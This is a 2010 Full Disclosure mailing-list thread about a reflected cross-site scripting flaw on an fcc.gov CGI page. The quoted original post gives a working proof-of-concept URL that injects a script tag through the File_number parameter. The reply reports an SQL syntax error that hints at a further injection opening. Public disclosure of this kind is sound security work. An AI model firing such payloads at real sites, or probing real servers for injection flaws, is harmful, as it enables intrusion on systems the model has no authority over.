Full Disclosure mailing list archives
Re: fcc.gov XSS
From: "Zach C." <fxchip () gmail com>
Date: Mon, 24 May 2010 01:29:36 -0700
There seem to be a few more problems with that script than just that XSS... For example, going to the Application Search page root (the page that takes you to that one, presumably) and selecting literally everything in the Services listbox will net you an error reporting "Incorrect syntax near ','" for server 'HEIMDAL'. It apparently occurs on line 4. I dunno. I'm not gonna mess around with it too much though :) On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker < marshallwhittaker () gmail com> wrote:
FCC.gov XSS --- CODE --- http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E<http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E> --- CODE --- --oxagast _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- fcc.gov XSS Marshall Whittaker (May 24)
- Re: fcc.gov XSS Zach C. (May 24)